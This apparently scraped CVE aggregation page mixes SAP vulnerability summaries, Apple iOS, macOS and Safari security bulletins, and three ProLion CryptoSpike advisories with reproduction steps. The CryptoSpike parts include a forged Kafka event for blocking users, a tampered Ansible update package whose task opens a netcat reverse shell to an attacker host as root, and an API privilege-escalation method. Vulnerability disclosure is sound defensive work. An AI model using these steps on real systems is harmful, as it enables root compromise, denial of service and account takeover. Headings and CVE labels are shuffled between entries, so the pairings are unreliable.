SAP Business Objects Business Intelligence Platform is vulnerable to stored XSS allowing an attacker to upload agnostic documents in the system which when opened by any other user could lead to high impact on integrity of the application.



CVE-2023-42478

Missing authentication in the internal data streaming system in ProLion CryptoSpike 3.0.15P2 allows remote unauthenticated users to read potentially sensitive information and deny service to users by directly reading and writing data in Apache Kafka (as consumer and producer).

Missing authentication in the internal data streaming system in ProLion CryptoSpike 3.0.15P2 allows remote unauthenticated users to read potentially sensitive information and deny service to users by directly reading and writing data in Apache Kafka (as consumer and producer).  
 

**Introduction**

CryptoSpike leverages the Kafka system in order to communicate the events regarding file access on the NAS storage to the CryptoSpike sub-components involved in the elaboration. By using a Kafka client, it is possible to authenticate on Kafka without authentication from an attacker server and act in _consumer_ or _producer_ mode. In consumer mode it is possible to read from processed events all metadata of operations and files (filename and complete path on the network share, user identifier, date/time, etc.). In producer mode it is even possible to insert forged events that could lead to network shares' users interdiction.

**Steps to reproduce**

The CryptoSpike system is deployed in Active monitoring mode with a configuration consisting of one Leader node and two Agents.

By using the tool "kcat" (also known as Kafka Cat) as client of Kafka service, connect to any one of the Kafka on the CryptoSpike servers in order to find the list of the Kafka "topics":

By connecting through kcat client as _consumer_ without authentication to the Kafka topic **local.cs.fct.file-events.0** on any one of the Kafka services (Leader or Agent), it is possible to capture information about files and storage users. Instead, by connecting as producer it is possible to insert multiple forged events that simulate the file writing of a file with an extension (.YOLO in the example) forbidden by one of the rules. In the next picture, on the left the connection as producer, on the right the connection as consumer:

The fake event written as producer is the following one:

{"eventType":"CREATE","filePath":"/test_FAKE2.YOLO","fileName":"test_FAKE2.YOLO","extension":"YOLO","displayFilePath":"\\\\[REDACTED IP].127\\testshare\\test_FAKE2.YOLO","filePathAfterRename":null,"userId":"S-1-5-21-3279977989-1286463912-761590908-500","userIdType":"WINDOWS","userIp":"[REDACTED IP].127","fileSystemObjectType":"FILE","fileProtocol":"SMB","fileProtocolVersion":"3.1","timestamp":1675681906.343000216,"timestampNano":343000216,"storagePlatform":"ONTAP","clusterId":402,"clusterName":"hq-stor","serverId":502,"serverName":"svm0_cifs","shareId":602,"shareName":"testshare","volumeId":552,"volumeName":"svm0_cifs_root","localAddress":"172.18.0.14","remoteAddress":"[REDACTED IP].55","policyName":"Prolion_CS_POLICY_ACTIVE_cifs","synchronous":true,"accessControlResult":"{\"additionalInformation\":{\"configurationItemId\":\"1552\",\"blockListItem\":\"yolo\"},\"blocked\":true,\"reason\":\"Extension matched.\",\"accessControlType\":\"BLOCK_LIST\",\"userIgnored\":false,\"audited\":true}","accessControlType":"BLOCK_LIST","blocked":true,"userIgnored":false}

All the forged events written from the rogue producer are captured from the system and showed on the management interface of CryptoSpike:

After around one minute of time, the network share user indicated in the forged message is automatically blocked from CryptoSpike, despite this user never executed an operation on the NAS storage:

  

Note: to reproduce the test it is necessary:

*   In case of CIFS shares, the Active Directory instance must be active, and the victim user ID must be known.
*   More than 5 fake messages regarding the fake anomaly must be published to cause the blocking of the user.
*   Each of these 5 messages must have a minimal variation from each one (all the timestamp fields can be set in a way that they are close together and to the current time)

Finally, by inserting as producer inside the Kafka topic a message that is not conforming to expected by CryptoSpike format, it is possible to block the entire system. For example, by sending a JSON with unexpected format ({ "TEST": "TEST" }) or a free text, the storage monitoring function of CryptoSpike is made unavailable. Being the Kafka instances running on the Leader and Agent nodes all synchronized, the unavailability of the service propagates to all the CryptoSpike Event Analyzer containers of the architecture.

cryptoleader:~$ check-services 
=== UNDERREPLICATED SERVICES: 1 ===
REPLICAS   MODE         NAME
0/1        replicated   application\_services\_event\_analyzer

cryptoagent1:/prolion/scripts$ check-services 
=== UNDERREPLICATED SERVICES: 1 ===
REPLICAS   MODE         NAME
0/1        replicated   application\_services\_event\_analyzer

cryptoagent2:/prolion/scripts$ check-services 
=== UNDERREPLICATED SERVICES: 1 ===
REPLICAS   MODE         NAME
0/1        replicated   application\_services\_event\_analyzer

CVE-2023-36648: CVCN

A missing integrity check in the update system in ProLion CryptoSpike 3.0.15P2 allows attackers to execute OS commands as the root Linux user on the host system via forged update packages.

A missing integrity check in the update system in ProLion CryptoSpike3.0.15P2 allows attackers to execute OS commands as the root Linux user on the host system via forged update packages  
 

**Introduction**

The CryptoSpike system provides an update function that can work both in online mode when the server has Internet access, and in offline mode. In the latter case, the software update is performed by uploading in CryptoSpike the update packages released by the vendor in the form of archive files. The operation can be performed through a special section on the management interface or, in alternative, though REST APIs.

It has been verified that the update system in offline mode is unsecure because no authenticity and integrity checks are performed on the update packages released by the vendor, hence a malicious actor can forge the packages before they are loaded on the system. Consequently, it is possible to specify a series of operating system commands inside the update files, that will be executed on all the nodes of the system (leader and agents) with root privileges.

**Steps to reproduce**

Connect to the Cryptospike web management interface (on the Leader node) with an identity having a role including the “Update” permission set to MODIFY, access the “System”, “Update” section where it is possible to upload updates in .tgz format.

The malicious actor modifies an existing update package or prepares one similar to the one expected from the product (i.e., an Ansible descriptor in YAML format, with setup.yml name inside a directory named "bundle") containing two malicious commands, the first one will write a file inside the /tmp/ directory on the filesystem and the second one will open a reverse shell towards an attacker machine:

\---
- name: Hacked script
  hosts: all
  become: yes
  vars:
    # product information
    product\_name: "Product"
    product\_version: "V0.0.0"
    # base directory where the bundle files are located
    target\_dir: "/prolion/packages"
    log\_dir: "/prolion/logs"
    log\_file\_name: "update\_os.log"

  tasks:
    - name: "create a file"
      shell: "echo HACKED > /tmp/HACKED.txt"

    - name: "execute reverse shell"
      shell: "nc \[REDACTED IP\].230 1234 -e /bin/sh" 

On the attacker machine a _netcat_ has been launched in advance in listening mode on the same port specified in the commands inside the update bundle file as in the source above:

After some moments, the Ansible tasks are correctly executed by the update subsystem with root privileges, as shown in the picture below, where the obtained reverse shell allows to verify the root privileges of the running user on the host server (the leader host node, not the container node) and a file owned by root has been written inside /tmp/ directory on the filesystem.

It has also been verified that the Ansible tasks can be run on all the infrastructure nodes (Leader and Agent nodes) and without prior checks on the .tgz archive contents, thus allowing _"zip bomb"_ attacks that would cause a complete crash of the system.

CVE-2023-36650: CVCN

An unauthenticated attacker can embed a hidden access to a Biller Direct URL in a frame which, when loaded by the user, will submit a cross-site scripting request to the Biller Direct system. This can result in the disclosure or modification of non-sensitive information.



CVE-2023-42479

A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2. An app may be able to access sensitive user data.

Released December 11, 2023

**Accounts**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive user data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-42919: Kirin (@Pwnrin)

**AVEVideoEncoder**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to disclose kernel memory

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-42884: an anonymous researcher

**Bluetooth**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An attacker in a privileged network position may be able to inject keystrokes by spoofing a keyboard

Description: The issue was addressed with improved checks.

CVE-2023-45866: Marc Newlin of SkySafe

Entry added December 11, 2023

**ExtensionKit**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive user data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-42927: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

**Find My**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-42922: Wojciech Regula of SecuRing (wojciechregula.blog)

**ImageIO**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: Processing an image may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

CVE-2023-42898: Junsung Lee

CVE-2023-42899: Meysam Firouzi @R00tkitSMM and Junsung Lee

**Kernel**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved memory handling.

CVE-2023-42914: Eloi Benoist-Vanderbeken (@elvanderb) of Synacktiv (@Synacktiv)

**Safari Private Browsing**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: Private Browsing tabs may be accessed without authentication

Description: This issue was addressed through improved state management.

CVE-2023-42923: ARJUN S D

**Siri**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: An attacker with physical access may be able to use Siri to access sensitive user data

Description: The issue was addressed with improved checks.

CVE-2023-42897: Andrew Goldberg of The McCombs School of Business, The University of Texas at Austin (linkedin.com/andrew-goldberg-/)

**WebKit**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 259830  
CVE-2023-42890: Pwn2car

**WebKit**

Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later

Impact: Processing an image may lead to a denial-of-service

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 263349  
CVE-2023-42883: Zoom Offensive Security Team

CVE-2023-42927: About the security content of iOS 17.2 and iPadOS 17.2

Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.

Released December 11, 2023

**Accessibility**

Available for: macOS Sonoma

Impact: Secure text fields may be displayed via the Accessibility Keyboard when using a physical keyboard

Description: This issue was addressed with improved state management.

CVE-2023-42874: Don Clarke

**Accounts**

Available for: macOS Sonoma

Impact: An app may be able to access sensitive user data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-42919: Kirin (@Pwnrin)

**AppleEvents**

Available for: macOS Sonoma

Impact: An app may be able to access information about a user's contacts

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-42894: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

**AppleGraphicsControl**

Available for: macOS Sonoma

Impact: Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution

Description: Multiple memory corruption issues were addressed with improved input validation.

CVE-2023-42901: Ivan Fratric of Google Project Zero

CVE-2023-42902: Ivan Fratric of Google Project Zero, and Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative

CVE-2023-42912: Ivan Fratric of Google Project Zero

CVE-2023-42903: Ivan Fratric of Google Project Zero

CVE-2023-42904: Ivan Fratric of Google Project Zero

CVE-2023-42905: Ivan Fratric of Google Project Zero

CVE-2023-42906: Ivan Fratric of Google Project Zero

CVE-2023-42907: Ivan Fratric of Google Project Zero

CVE-2023-42908: Ivan Fratric of Google Project Zero

CVE-2023-42909: Ivan Fratric of Google Project Zero

CVE-2023-42910: Ivan Fratric of Google Project Zero

CVE-2023-42911: Ivan Fratric of Google Project Zero

CVE-2023-42926: Ivan Fratric of Google Project Zero

**AppleVA**

Available for: macOS Sonoma

Impact: Processing an image may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

CVE-2023-42882: Ivan Fratric of Google Project Zero

**Archive Utility**

Available for: macOS Sonoma

Impact: An app may be able to access sensitive user data

Description: A logic issue was addressed with improved checks.

CVE-2023-42924: Mickey Jin (@patch1t)

**AVEVideoEncoder**

Available for: macOS Sonoma

Impact: An app may be able to disclose kernel memory

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-42884: an anonymous researcher

**Bluetooth**

Available for: macOS Sonoma

Impact: An attacker in a privileged network position may be able to inject keystrokes by spoofing a keyboard

Description: The issue was addressed with improved checks.

CVE-2023-45866: Marc Newlin of SkySafe

**CoreMedia Playback**

Available for: macOS Sonoma

Impact: An app may be able to access user-sensitive data

Description: The issue was addressed with improved checks.

CVE-2023-42900: Mickey Jin (@patch1t)

**CoreServices**

Available for: macOS Sonoma

Impact: A user may be able to cause unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-42886: Koh M. Nakagawa (@tsunek0h)

**ExtensionKit**

Available for: macOS Sonoma

Impact: An app may be able to access sensitive user data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-42927: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

**Find My**

Available for: macOS Sonoma

Impact: An app may be able to read sensitive location information

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-42922: Wojciech Regula of SecuRing (wojciechregula.blog)

**ImageIO**

Available for: macOS Sonoma

Impact: Processing an image may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

CVE-2023-42898: Junsung Lee

CVE-2023-42899: Meysam Firouzi @R00tkitSMM and Junsung Lee

**IOKit**

Available for: macOS Sonoma

Impact: An app may be able to monitor keystrokes without user permission

Description: An authentication issue was addressed with improved state management.

CVE-2023-42891: an anonymous researcher

**Kernel**

Available for: macOS Sonoma

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved memory handling.

CVE-2023-42914: Eloi Benoist-Vanderbeken (@elvanderb) of Synacktiv (@Synacktiv)

**ncurses**

Available for: macOS Sonoma

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2020-19185

CVE-2020-19186

CVE-2020-19187

CVE-2020-19188

CVE-2020-19189

CVE-2020-19190

**SharedFileList**

Available for: macOS Sonoma

Impact: An app may be able to access sensitive user data

Description: The issue was addressed with improved checks.

CVE-2023-42842: an anonymous researcher

**TCC**

Available for: macOS Sonoma

Impact: An app may be able to access protected user data

Description: A logic issue was addressed with improved checks.

CVE-2023-42932: Zhongquan Li (@Guluisacat)

**Vim**

Available for: macOS Sonoma

Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution

Description: This issue was addressed by updating to Vim version 9.0.1969.

CVE-2023-5344

**WebKit**

Available for: macOS Sonoma

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 259830  
CVE-2023-42890: Pwn2car

**WebKit**

Available for: macOS Sonoma

Impact: Processing an image may lead to a denial-of-service

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 263349  
CVE-2023-42883: Zoom Offensive Security Team

CVE-2023-42926: About the security content of macOS Sonoma 14.2

The issue was addressed with improved memory handling. This issue is fixed in Safari 17.2, macOS Sonoma 14.2, watchOS 10.2, iOS 17.2 and iPadOS 17.2, tvOS 17.2. Processing web content may lead to arbitrary code execution.

This document describes the security content of Safari 17.2.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security releases page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**Safari 17.2**

Released December 11, 2023

**WebKit**

Available for: macOS Monterey and macOS Ventura

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 259830  
CVE-2023-42890: Pwn2car

**WebKit**

Available for: macOS Monterey and macOS Ventura

Impact: Processing an image may lead to a denial-of-service

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 263349  
CVE-2023-42883: Zoom Offensive Security Team

**Additional recognition**

**WebKit**

We would like to acknowledge 椰椰 for their assistance.

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: December 11, 2023

CVE-2023-42890: About the security content of Safari 17.2

A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2. An app may be able to access protected user data.

Released December 11, 2023

**Accounts**

Available for: macOS Ventura

Impact: An app may be able to access sensitive user data

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-42919: Kirin (@Pwnrin)

**AppleEvents**

Available for: macOS Ventura

Impact: An app may be able to access information about a user's contacts

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-42894: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

**Archive Utility**

Available for: macOS Ventura

Impact: An app may be able to access sensitive user data

Description: A logic issue was addressed with improved checks.

CVE-2023-42924: Mickey Jin (@patch1t)

**AVEVideoEncoder**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-42884: an anonymous researcher

**CoreServices**

Available for: macOS Ventura

Impact: A user may be able to cause unexpected app termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-42886: Koh M. Nakagawa (@tsunek0h)

**Find My**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-42922: Wojciech Regula of SecuRing (wojciechregula.blog)

**ImageIO**

Available for: macOS Ventura

Impact: Processing an image may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

CVE-2023-42899: Meysam Firouzi @R00tkitSMM and Junsung Lee

**IOKit**

Available for: macOS Ventura

Impact: An app may be able to monitor keystrokes without user permission

Description: An authentication issue was addressed with improved state management.

CVE-2023-42891: an anonymous researcher

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved memory handling.

CVE-2023-42914: Eloi Benoist-Vanderbeken (@elvanderb) of Synacktiv (@Synacktiv)

**ncurses**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2020-19185

CVE-2020-19186

CVE-2020-19187

CVE-2020-19188

CVE-2020-19189

CVE-2020-19190

**TCC**

Available for: macOS Ventura

Impact: An app may be able to access protected user data

Description: A logic issue was addressed with improved checks.

CVE-2023-42932: Zhongquan Li (@Guluisacat)

**Vim**

Available for: macOS Ventura

Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution

Description: This issue was addressed by updating to Vim version 9.0.1969.

CVE-2023-5344

CVE-2023-42932: About the security content of macOS Ventura 13.6.3

In SAP Commerce Cloud - versions HY_COM 1905, HY_COM 2005, HY_COM2105, HY_COM 2011, HY_COM 2205, COM_CLOUD 2211, a locked B2B user can misuse the forgotten password functionality to un-block his user account again and re-gain access if SAP Commerce Cloud - Composable Storefront is used as storefront, due to weak access controls in place. This leads to a considerable impact on confidentiality and integrity.



CVE-2023-42481

Incorrect user role checking in multiple REST API endpoints in ProLion CryptoSpike 3.0.15P2 allows a remote attacker with low privileges to execute privileged functions and achieve privilege escalation via REST API endpoint invocation.

Incorrect user role checking in multiple REST API endpoints in ProLion CryptoSpike 3.0.15P2 allows a remote attacker with low privileges to execute privileged functions and achieve privilege escalation via REST API endpoint invocation.  
 

**Introduction**

The REST API endpoint used to modify CryptoSpike users suffers from the following vulnerabilities, which can be exploited from users with minimal privileges:

*   no authorization checks on the user attributes modification, also including role assignments, leading to a privilege escalation up to the role of privileged administrator of the system;
*   lacking input validation functionalities, allowing the modification of all users' attributes (e.g. deactivate them, assigning privileged roles, etc);
*   possibility to change the password of any user, including privileged ones;
*   possibility to show the password hash of any user.

Additionally, the lack of accountability functionalities makes this vulnerability hard to investigate.

**Steps to reproduce**

For the invocation of the vulnerable REST API endpoints, a JWT Bearer Token of a user with minimum privileges will be used. In the example, a user with id 10 named "simpleuser" and only the "Monitoring" privilege set to READ (this privilege exclusively allows a user to check the status of CryptoSpike services) is created:

Invoking with PATCH http method the /users/:userId REST API endpoint under the service "AuthService" (https://hostname/api/v1/Server/auth/users/:userId) it is possible to send, as input, parameters that are not documented in API specification (for example, the attributes _password_, _immutable_). In our case, using the JWT Bearer Token of the user with id 10 and low privileges, it is possible to modify another user (with id 37 in the example). Please note that it is mandatory to include the parameter "roles":

The same endpoint has an issue with the output data, because on every successful invocation, it returns all the user data as stored in the database table. This data also includes the password hash of the modified user. It is also possible to modify other attributes not documented in the API specification: the "immutable" attribute to make a user not editable by other operators, "deletedAt" and "state" attributes do deactivate users.

With this data leakage vulnerability, it is possible to enumerate the password hashes of all users simply varying the :id parameter (for example, from 1 to 3000):

It is also possible to change the password of every other user by simply specifying the password on the JSON parameter, in clear text, including the default privileged user of CryptoSpike named "sysadm" (id equal to 1):

Invoking the same REST API endpoint specifying the current user id as parameter (in the example, using the JWT token of the user with id 10 on the /users/10 endpoint), it is possible to self-attribute the role with id 1 ("Administrator"), thus realizing a complete privilege escalation attack. It is also possible to set the parameter "immutable" to true, thus transforming itself into an immutable user against other users' modifications.

Source

CVE